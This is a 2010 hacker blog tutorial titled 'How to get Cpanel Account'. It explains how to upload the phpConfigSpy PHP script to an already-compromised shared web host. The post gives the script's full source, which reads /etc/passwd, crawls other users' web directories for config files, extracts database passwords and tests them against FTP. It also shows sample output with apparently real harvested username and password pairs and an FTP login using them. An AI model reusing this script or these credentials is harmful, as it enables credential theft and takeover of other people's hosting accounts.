…::[BABY CORP]::… | Web Design Services | Site:www.babycorp.pro free hosting-hostgator baby corp tutorial/free hosting-hostgator/index.html - Hostgator /etc/passwd

How to get Cpanel Account

Posted by BabyCorp On August - 14 - 2010

PhpConfigSpy is one tool that is great to get some Account in the website like cpanel login, ssh login (if web target supported SSH) and maybe database login.

Most of us, after getting a web target ( Via inject PHP ) we will use that web only for BOT ( EGGDROP, PSYBNC ). Why we do not try to get full access to the Web target.

Let’s we try to get some information login from web target with PhpConfigSpy tool.

Here the tutorial :

Upload PhpConfigSpy.txt into web target, and after that rename this file from .txt become .php. It’s finish, that’s all. You can test that tool using browser (IE, Firefox, Opera, etc). For Example http://www.yourtarget.com/portal/images/phpconfigspy.php.

And this is the result of scaning :

[+] Founded 113 entrys in /etc/passwd

[+] Founded 113 readable public_html directories

[~] Searching for passwords in config.* files…

[+] /home/cofinca/public_html/portal/mambots/editors/fckeditor/editor/filemanager/connectors/php/config.php

ew database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix, $mosConfig

[+] /home/bsidenet/public_html/configuration.php

bside123

[FTP] bsidenet:bside123 Success

[+] /home/gratis/public_html/configuration.php

deko93tg

[FTP] gratis:deko93tg Success

Binggo… That is success !!!

You can check that username via FTP or SSH (if target supported SSH)

Let we check together for this login

[FTP] bsidenet:bside123 Success

That’s mean user : bsidenet and password : bside123

C:\Documents and Settings\0286061961>ftp alvoaxxxx.pt

Connected to alvoaxxxx.pt.

220———- Welcome to Pure-FTPd [TLS] ———-

220-You are user number 1 of 50 allowed.

220-Local time is now 04:02. Server port: 21.

220-IPv6 connections are also welcome on this server.

220 You will be disconnected after 15 minutes of inactivity.

User (alvoaxxxx.pt:(none)): bsidenet

331 User bsidenet OK. Password required

Password:

230-User bsidenet has group access to: bsidenet

230 OK. Current restricted directory is /

ftp> dir

200 PORT command successful

150 Connecting to port 41080

drwx–x–x 8 32137 bsidenet 4096 Mar 26 23:06 .

drwx–x–x 8 32137 bsidenet 4096 Mar 26 23:06 ..

-rw-r–r– 1 32137 bsidenet 24 Mar 26 23:04 .bash_logout

-rw-r–r– 1 32137 bsidenet 191 Mar 26 23:04 .bash_profile

-rw-r–r– 1 32137 bsidenet 124 Mar 26 23:04 .bashrc

-rw-r–r– 1 32137 bsidenet 19 Mar 26 23:04 .contactemail

drwx—— 2 32137 bsidenet 4096 Apr 23 00:22 .cpanel-datastore

-rw——- 1 32137 bsidenet 14 Apr 23 16:06 .lastlogin

drwxr-xr-x 2 32137 bsidenet 4096 Mar 26 23:04 etc

drwxr-x— 5 32137 12 4096 Mar 26 23:04 mail

drwxr-xr-x 3 32137 bsidenet 4096 Feb 12 2007 public_ftp

drwxr-x— 6 32137 99 4096 Apr 23 17:43 public_html

drwxr-xr-x 7 32137 bsidenet 4096 Mar 26 23:22 tmp

lrwxrwxrwx 1 32137 bsidenet 11 Mar 26 23:04 www -> public_html

226-Options: -a -l

226 14 matches total

ftp: 936 bytes received in 0.00Seconds 936000.00Kbytes/sec.

ftp>

It’s Work

Here The Script :

<?php
/*
phpConfigSpy v0.2
coded by ...::[BABY CORP]::...
(c) http://www.babycorp.name/
*/

echo "<html>";
echo "<title>...::[BABY CORP]::...</title><body>";

set_time_limit(0);
##################
@$passwd=fopen('/etc/passwd','r');
if (!$passwd) {
 echo "[-] Error : coudn't read /etc/passwd";
 exit;
}
$path_to_public=array();
$users=array();
$pathtoconf=array();
$i=0;

while(!feof($passwd)) {
 $str=fgets($passwd);
 if ($i>35) {
 $pos=strpos($str,":");
 $username=substr($str,0,$pos);
 $dirz="/home/$username/public_html/";
 if (($username!="")) {
 if (is_readable($dirz)) {
 array_push($users,$username);
 array_push($path_to_public,$dirz);
 }
 }
 }
 $i++;
}
###################

#########################
echo "<br><br>";
echo "<textarea name='main_window' cols=100 rows=20>";

echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories\n";

echo "[~] Searching for passwords in config.* files...\n\n";
foreach ($users as $user) {
 $path="/home/$user/public_html/";
 read_dir($path,$user);
}

echo "\n[+] Done\n";

function read_dir($path,$username) {
 if ($handle = opendir($path)) {
 while (false !== ($file = readdir($handle))) {
 $fpath="$path$file";
 if (($file!='.') and ($file!='..')) {
 if (is_readable($fpath)) {
 $dr="$fpath/";
 if (is_dir($dr)) {
 read_dir($dr,$username);
 }
 else {
 if (($file=='config.php') or ($file=='config.inc.php') or ($file=='config.local.php') or ($file=='config.db.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='configuration.php') or ($file=='class.database.php') or ($file=='db_connect.php')) {
 $pass=get_pass($fpath);
 if ($pass!='') {
 echo "[+] $fpath\n$pass\n";
 ftp_check($username,$pass);
 }
 }
 }
 }
 }
 }
 }
}

function get_pass($link) {
 @$config=fopen($link,'r');
 while(!feof($config)) {
 $line=fgets($config);
 if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) {
 if (strrpos($line,'"'))
 $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
 else
 $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
 return $pass;
 }
 }
}

function ftp_check($login,$pass) {
 @$ftp=ftp_connect('127.0.0.1');
 if ($ftp) {
 @$res=ftp_login($ftp,$login,$pass);
 if ($res) {
 echo '[FTP] '.$login.':'.$pass."  Success\n";
 }
 else ftp_quit($ftp);
 }
}

echo "</textarea><br><br>Coded by <a href=http://www.babycorp.name/><b>...::[BABY CORP]::...</b></a>";

echo "</body></html>";
?>